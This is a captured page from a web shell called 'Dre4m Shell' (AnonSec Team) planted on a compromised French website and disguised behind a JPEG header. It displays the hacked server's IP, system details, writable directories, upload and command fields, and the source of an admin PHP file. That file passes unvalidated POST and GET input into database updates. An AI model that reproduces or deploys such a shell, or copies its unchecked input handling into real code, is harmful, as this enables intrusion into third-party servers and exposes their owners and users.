ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/amper-formance.fr/cp-admin/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/amper-formance.fr/cp-admin/includes/set_position_simple.php
<?php
    include_once('../../includes/webzone.php');

    // Récupération des valeurs post envoyé par la requête Ajax
    $sortlist = $_POST['sortlist'];
 
    // On indique le premier indice de position souhaité
    $position = 1;
 
    // Et on met à jour la base de données
    foreach($sortlist as $id)
    {
        $values = array('position' => $position); 
        update_posted_data($values, substr($id, 4), $GLOBALS['db_table'][$_GET['table']]);
        $position++;
    }
?>

Anon7 - 2022
AnonSec Team